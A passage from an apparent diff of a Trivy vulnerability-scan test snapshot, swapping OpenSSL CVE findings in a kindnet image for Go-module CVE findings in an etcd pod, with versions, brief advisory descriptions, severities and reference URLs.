(Affected 1.0.2-1.0.2t).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "openssl: Integer overflow in RSAZ modular exponentiation on x86_64", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1551", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00030.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "http://packetstormsecurity.com/files/155754/Slackware-Security-Advisory-openssl-Updates.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1551", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1551", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=419102400a2811582a7a3d4a4e317d72e5ce0a8f", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f1c5eea8a817075d31e43f5876993c6710238c98", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "https://github.com/openssl/openssl/pull/10575", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-1551.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4514.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DDHOAATPWJCXRNFMJ2SASDBBNU5RJONY/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EXDDAOWSAIEFQNBHWYE6PPYFV4QXGMCD/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XVEP3LAK4JSPRXFO4QF4GG2IVXADV3SO/", + "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1551", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", }, { "type": "URL", - "value": "https://seclists.org/bugtraq/2019/Dec/39", + "value": "https://github.com/advisories/GHSA-69cg-p879-7622", }, { "type": "URL", - "value": "https://seclists.org/bugtraq/2019/Dec/46", + "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202004-10", + "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20191210-0001/", + "value": "https://github.com/golang/go/issues/54658", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4376-1", + "value": "https://go.dev/cl/428735", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4504-1", + "value": "https://go.dev/issue/54658", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4376-1/", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4504-1/", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1551", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", }, { "type": "URL", - "value": "https://www.debian.org/security/2019/dsa-4594", + "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4855", + "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20191206.txt", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2020.html", + "value": "https://pkg.go.dev/vuln/GO-2022-0969", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2019-09", + "value": "https://security.gentoo.org/glsa/202209-26", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2020-03", + "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2020-11", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-10", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1d-0+deb10u5", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-23841", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.7.0", + "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41723", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", "references": [ - "http://seclists.org/fulldisclosure/2021/May/67", - "http://seclists.org/fulldisclosure/2021/May/68", - "http://seclists.org/fulldisclosure/2021/May/70", - "https://access.redhat.com/security/cve/CVE-2021-23841", - "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", - "https://github.com/advisories/GHSA-84rm-qf37-fgc2", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", - "https://linux.oracle.com/cve/CVE-2021-23841.html", - "https://linux.oracle.com/errata/ELSA-2021-9561.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", - "https://rustsec.org/advisories/RUSTSEC-2021-0058", - "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", - "https://security.gentoo.org/glsa/202103-03", - "https://security.netapp.com/advisory/ntap-20210219-0009/", - "https://security.netapp.com/advisory/ntap-20210513-0002/", - "https://support.apple.com/kb/HT212528", - "https://support.apple.com/kb/HT212529", - "https://support.apple.com/kb/HT212534", - "https://ubuntu.com/security/notices/USN-4738-1", - "https://ubuntu.com/security/notices/USN-4745-1", - "https://www.cve.org/CVERecord?id=CVE-2021-23841", - "https://www.debian.org/security/2021/dsa-4855", - "https://www.openssl.org/news/secadv/20210216.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-03", - "https://www.tenable.com/security/tns-2021-09", + "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "https://go.dev/cl/468135", + "https://go.dev/cl/468295", + "https://go.dev/issue/57855", + "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "https://pkg.go.dev/vuln/GO-2023-1571", + "https://vuln.go.dev/ID/GO-2023-1571.json", + "https://www.cve.org/CVERecord?id=CVE-2022-41723", ], }, "category": "Vulnerability", - "description": "The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "openssl: NULL pointer dereference in X509_issuer_and_serial_hash()", + "name": "avoid quadratic complexity in HPACK decoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-23841", + "value": "https://avd.aquasec.com/nvd/cve-2022-41723", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/May/67", + "value": "https://access.redhat.com/security/cve/CVE-2022-41723", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/May/68", + "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/May/70", + "value": "https://go.dev/cl/468135", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-23841", + "value": "https://go.dev/cl/468295", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "value": "https://go.dev/issue/57855", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", + "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-84rm-qf37-fgc2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "value": "https://pkg.go.dev/vuln/GO-2023-1571", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-23841.html", + "value": "https://vuln.go.dev/ID/GO-2023-1571.json", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.4.0", + "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41717", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2367", + "https://access.redhat.com/security/cve/CVE-2022-41717", + "https://bugzilla.redhat.com/2092793", + "https://bugzilla.redhat.com/2161274", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "https://go.dev/cl/455635", + "https://go.dev/cl/455717", + "https://go.dev/issue/56350", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-41717.html", + "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "https://pkg.go.dev/vuln/GO-2022-1144", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-41717", + ], + }, + "category": "Vulnerability", + "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", + "value": "https://avd.aquasec.com/nvd/cve-2022-41717", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058", + "value": "https://access.redhat.com/errata/RHSA-2023:2367", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-41717", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202103-03", + "value": "https://bugzilla.redhat.com/2092793", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212528", + "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212529", + "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212534", + "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4738-1", + "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4745-1", + "value": "https://go.dev/cl/455635", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-23841", + "value": "https://go.dev/cl/455717", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4855", + "value": "https://go.dev/issue/56350", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210216.txt", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-03", + "value": "https://pkg.go.dev/vuln/GO-2022-1144", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", }, ], "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.1.1d-0+deb10u6", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3449", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.0.0-20220412211240-33da011f77ad", + "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29526", + "installedVersion": "v0.0.0-20210615035016-665e8c7367d1", + "packageName": "golang.org/x/sys", "references": [ - "http://www.openwall.com/lists/oss-security/2021/03/27/1", - "http://www.openwall.com/lists/oss-security/2021/03/27/2", - "http://www.openwall.com/lists/oss-security/2021/03/28/3", - "http://www.openwall.com/lists/oss-security/2021/03/28/4", - "https://access.redhat.com/security/cve/CVE-2021-3449", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", - "https://github.com/advisories/GHSA-83mx-573x-5rw9", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", - "https://linux.oracle.com/cve/CVE-2021-3449.html", - "https://linux.oracle.com/errata/ELSA-2021-9151.html", - "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", - "https://rustsec.org/advisories/RUSTSEC-2021-0055", - "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", - "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", - "https://security.gentoo.org/glsa/202103-03", - "https://security.netapp.com/advisory/ntap-20210326-0006/", - "https://security.netapp.com/advisory/ntap-20210513-0002/", - "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", - "https://ubuntu.com/security/notices/USN-4891-1", - "https://ubuntu.com/security/notices/USN-5038-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3449", - "https://www.debian.org/security/2021/dsa-4875", - "https://www.openssl.org/news/secadv/20210325.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-05", - "https://www.tenable.com/security/tns-2021-06", - "https://www.tenable.com/security/tns-2021-09", - "https://www.tenable.com/security/tns-2021-10", + "https://access.redhat.com/security/cve/CVE-2022-29526", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "https://github.com/golang/go/issues/52313", + "https://go.dev/cl/399539", + "https://go.dev/cl/400074", + "https://go.dev/issue/52313", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "https://linux.oracle.com/cve/CVE-2022-29526.html", + "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "https://pkg.go.dev/vuln/GO-2022-0493", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220729-0001/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29526", ], }, "category": "Vulnerability", - "description": "An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "openssl: NULL pointer dereference in signature_algorithms processing", + "name": "faccessat checks wrong group", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3449", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/27/1", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/27/2", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/28/3", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/28/4", + "value": "https://avd.aquasec.com/nvd/cve-2022-29526", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3449", + "value": "https://access.redhat.com/security/cve/CVE-2022-29526", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", + "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", + "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", + "value": "https://github.com/golang/go/issues/52313", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-83mx-573x-5rw9", + "value": "https://go.dev/cl/399539", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", + "value": "https://go.dev/cl/400074", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", + "value": "https://go.dev/issue/52313", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3449.html", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9151.html", + "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", + "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", + "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202103-03", + "value": "https://pkg.go.dev/vuln/GO-2022-0493", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210326-0006/", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", + "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", }, { "type": "URL", - "value": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4891-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "0.3.7", + "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-38561", + "installedVersion": "v0.3.6", + "packageName": "golang.org/x/text", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-38561", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", + "https://deps.dev/advisory/OSV/GO-2021-0113", + "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", + "https://go.dev/cl/340830", + "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "https://groups.google.com/g/golang-announce", + "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "https://pkg.go.dev/golang.org/x/text/language", + "https://pkg.go.dev/vuln/GO-2021-0113", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2021-38561", + ], + }, + "category": "Vulnerability", + "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can 